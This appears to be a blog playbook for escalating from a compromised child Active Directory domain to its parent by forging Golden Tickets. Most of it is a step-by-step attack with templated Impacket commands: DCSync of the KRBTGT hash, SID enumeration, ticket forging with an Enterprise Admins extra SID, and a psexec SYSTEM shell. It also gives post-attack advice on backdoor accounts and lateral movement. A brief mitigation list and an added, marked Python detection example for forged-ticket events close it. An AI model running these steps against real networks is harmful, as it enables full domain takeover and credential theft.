Child-Parent AD Exploitation via Golden Tickets

This playbook provides a detailed, step-by-step guide to escalating privileges from a compromised child domain to a parent domain in an Active Directory (AD) environment. Each step includes an explanation, the tool usage, and notes to aid comprehension.

Overview

Active Directory (AD) environments often have trust relationships between domains. A child-to-parent domain trust allows users in the child domain to access resources in the parent domain. Attackers can exploit these trust relationships to escalate privileges and compromise the parent domain. This playbook focuses on leveraging Kerberos ticket forgery (Golden Ticket attacks) to achieve this.

Step 1: Information Gathering

To perform the attack, you need specific information about the child and parent domains. This data is essential for crafting a Golden Ticket.

What to Collect

  1. KRBTGT hash: The NTLM hash of the KRBTGT account in the child domain.
  2. Child Domain SID: The Security Identifier (SID) of the child domain.
  3. Target User Name: A username in the child domain (can be non-existent).
  4. Child Domain FQDN: Fully Qualified Domain Name of the child domain.
  5. Parent Domain Enterprise Admin SID: The SID of the Enterprise Admins group in the parent domain.

Tool 1: secretsdump.py (Impacket)

  • Purpose: Perform a DCSync attack to retrieve the KRBTGT hash from the child domain.
  • Command:
secretsdump.py <CHILD_DOMAIN>/<ADMIN_USER>@<CHILD_DC_IP>
  • Explanation:
    • This tool simulates a Domain Controller (DC) replication request using the DRSUAPI protocol.
    • It extracts sensitive information, including NTLM hashes for user accounts.
  • Output Example:

krbtgt:502:aad3b435b51404eeadeadbeef51404ee:9d765b482771505deadbeef065964d5f

Tool 2: lookupsid.py (Impacket)

  • Purpose: Enumerate SIDs for users, groups, and the domain by brute-forcing RIDs over the LSA.
  • Command:
lookupsid.py <CHILD_DOMAIN>/<USER>@<CHILD_DC_IP>
  • Explanation:
    • This tool queries the Local Security Authority (LSA) service on a DC to enumerate SIDs.
    • The output includes the domain SID and RID mappings for users/groups.
  • Output Example:

Domain SID is: S-1-5-21-2deadbeef9-209893948-9deadbeef

Notes:

  • The KRBTGT hash is critical for forging Kerberos tickets.
  • The Enterprise Admin SID is needed to escalate privileges into the parent domain.

Step 2: Constructing a Golden Ticket

A Golden Ticket is a forged Kerberos ticket that allows you to impersonate any user in a domain. In this attack, you will forge a ticket with elevated privileges in both domains.

Tool: ticketer.py (Impacket)

  • Purpose: Generate a Golden Ticket using the collected information.
  • Command:
ticketer.py -nthash <KRBTGT_HASH> -domain-sid <CHILD_DOMAIN_SID> \
  -domain <CHILD_DOMAIN_FQDN> -extra-sid <ENTERPRISE_ADMIN_SID> \
  -spn krbtgt/<PARENT_DOMAIN_FQDN> <FAKE_USERNAME>
  • Explanation:
    • -nthash: Specifies the NTLM hash of the KRBTGT account.
    • -domain-sid: Specifies the SID of the child domain.
    • -extra-sid: Adds the SID of the parent domain’s Enterprise Admins group.
    • -spn: Service Principal Name for Kerberos authentication in the parent domain.
    • <FAKE_USERNAME>: A placeholder username (e.g., “hacker”).
  • Output:
    • A .ccache file containing your forged Kerberos ticket.

Notes:

  • The extra SID allows you to escalate privileges into the parent domain by impersonating an Enterprise Admin.

Step 3: Using the Golden Ticket

Once you have created your Golden Ticket, you can use it to authenticate against resources in both domains.

Steps:

  1. Set up your environment to use the forged Kerberos ticket:
export KRB5CCNAME=<TICKET_FILENAME>.ccache

This tells your system to use this ticket for Kerberos authentication.

  2. Authenticate to a parent domain controller using Impacket’s psexec.py:
psexec.py <CHILD_DOMAIN_FQDN>/<FAKE_USERNAME>@<PARENT_DC_HOSTNAME> -k -no-pass

If successful, this provides a SYSTEM-level shell on the parent DC.

Notes:

  • Ensure that your .ccache file is correctly generated; otherwise, authentication will fail.
  • Use tools like klist to verify that your Kerberos ticket is loaded correctly.

Step 4: Automating with raiseChild.py

For an automated approach, Impacket’s raiseChild.py simplifies many steps by combining enumeration, ticket creation, and exploitation into one process.

Command Example:

raiseChild.py -target-exec <PARENT_DC_IP> <CHILD_DOMAIN_FQDN>/<ADMIN_USER>:<PASSWORD>

Workflow of raiseChild.py:

  1. Enumerates child and parent domains’ FQDNs.
  2. Retrieves SIDs for both domains.
  3. Extracts KRBTGT credentials from the child domain.
  4. Creates a Golden Ticket with elevated privileges for both domains.
  5. Authenticates into the parent DC using PsExec.

Notes:

  • While convenient, automated tools like raiseChild.py may fail or cause unintended side effects in production environments. Always understand and validate each step manually before relying on automation.

Post-Attack Activities

Once access to the parent domain is achieved:

  1. Use tools like BloodHound or PowerView to enumerate sensitive resources and identify additional attack paths.
  2. Establish persistence by creating backdoor accounts or modifying group memberships.
  3. Perform lateral movement across critical systems using tools like PsExec or RDP.

Mitigation Strategies

To prevent such attacks:

  1. Regularly rotate KRBTGT account passwords using Microsoft’s recommended two-step process.
  2. Enable SID filtering on inter-domain trusts to block unauthorised SID usage.
  3. Monitor for unusual Kerberos activity, such as long-lived tickets or excessive TGS requests.
  4. Implement Privileged Access Management (PAM) solutions to restrict administrative access.
  5. Deploy advanced detection tools like Microsoft Defender for Identity or SIEM solutions.
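To make item 3 concrete, here is an added detection example (not part of the original playbook) that runs offline over a few constructed Security-log records modelled on Windows event IDs 4768 (TGT request) and 4769 (TGS request). It flags two classic Golden Ticket indicators: a service-ticket request for an account the directory does not contain (the playbook's <FAKE_USERNAME>), and a service-ticket request with no preceding TGT request for that principal, since a forged TGT is never issued by the KDC. The event field names, the sample data and the helper function are assumptions for illustration.

```python
"""Golden-Ticket indicators over Kerberos audit events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events; names and timestamps are made up.
EVENTS = [
    {"id": 4768, "ts": "2024-05-01T08:00:00", "user": "alice",
     "domain": "CHILD.CORP.LOCAL", "service": "krbtgt"},
    {"id": 4769, "ts": "2024-05-01T08:00:05", "user": "alice",
     "domain": "CHILD.CORP.LOCAL", "service": "cifs/fs01.child.corp.local"},
    # No 4768 exists for this principal and the account is not in the
    # directory: the TGT presented here was forged, not issued by the KDC.
    {"id": 4769, "ts": "2024-05-01T09:12:31", "user": "hacker",
     "domain": "CHILD.CORP.LOCAL", "service": "krbtgt/PARENT.CORP.LOCAL"},
]

# Accounts the directory actually contains (constructed for the example).
KNOWN_ACCOUNTS = {("CHILD.CORP.LOCAL", "alice"), ("CHILD.CORP.LOCAL", "bob")}


def _key(domain, user):
    """Normalise (domain, user) so case differences do not hide a match."""
    return (domain.upper(), user.lower())


def find_golden_ticket_indicators(events, known_accounts,
                                  window=timedelta(hours=10)):
    """Return (reason, event) tuples for suspicious 4769 records.

    window defaults to the standard 10-hour maximum TGT lifetime: a genuine
    TGS request should be preceded by a TGT request inside that span.
    """
    tgt_times = defaultdict(list)
    for e in events:
        if e["id"] == 4768:
            tgt_times[_key(e["domain"], e["user"])].append(
                datetime.fromisoformat(e["ts"]))

    known = {_key(d, u) for d, u in known_accounts}
    findings = []
    for e in events:
        if e["id"] != 4769:
            continue
        key = _key(e["domain"], e["user"])
        ts = datetime.fromisoformat(e["ts"])
        if key not in known:
            findings.append(("unknown-account", e))
        if not any(timedelta(0) <= ts - t <= window for t in tgt_times[key]):
            findings.append(("tgs-without-tgt", e))
    return findings
```

In production the same two checks would be fed from the domain controllers' forwarded 4768/4769 events and a periodic export of account names, and the unknown-account check pairs well with a SID-filtering audit on the trust itself.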

Additional Resources

  1. Active Directory Exploitation Cheat Sheet
  2. The Hacker Recipes – Trusts
  3. ADSecurity Blog – Kerberos Golden Tickets
  4. MITRE ATT&CK Framework – Domain Trust Discovery

Final Notes

Understanding each step of this process is critical for both offensive security professionals and defenders. While tools like raiseChild.py provide automation, performing these steps manually ensures better understanding and troubleshooting capabilities during engagements or real-world scenarios.

For more insightful and engaging write-ups, visit kosokoking.com and stay ahead in the world of cybersecurity!
